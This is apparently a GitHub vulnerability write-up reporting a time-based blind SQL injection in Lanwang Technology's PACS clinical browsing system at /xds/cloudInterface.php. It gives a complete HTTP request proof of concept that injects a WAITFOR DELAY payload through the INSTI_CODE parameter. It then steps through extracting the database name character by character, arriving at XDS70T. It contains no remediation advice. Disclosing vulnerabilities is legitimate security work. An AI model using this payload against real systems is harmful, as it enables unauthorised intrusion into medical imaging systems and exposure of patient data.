Skip to content

Latest commit

 

History

History
35 lines (32 loc) · 2.24 KB

sql2.md

File metadata and controls

35 lines (32 loc) · 2.24 KB

There is a front-end SQL injection vulnerability in the clinical browsing system of Lanwang Technology Co., Ltd.

  1. Impact of vulnerabilities:PACS clinical browsing system
  2. Vulnerability location:/xds/cloudInterface.php

3.Recurrence of vulnerabilities The login interface is as shown in the figure

image Since the SQL injection here is a time-based blind injection, the database name needs to be determined through ASSCII. The POC is as follows Here, it is judged through truncation that the first position in the database is X

GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1
Host: ip:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9ppbslm6ue630ge9ptrdprb0d2
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23

image Here, it is judged through truncation that the second digit in the database is D. image Here, it is judged through truncation that the third digit in the database is S. image Here, it is judged through truncation that the fourth digit of the database is 7 image Here, it is judged by truncation that the fifth bit of the database is 0 image Here, it is judged through truncation that the sixth digit in the database is T image Here, it is determined through delayed injection that the name of the database is: XDS70T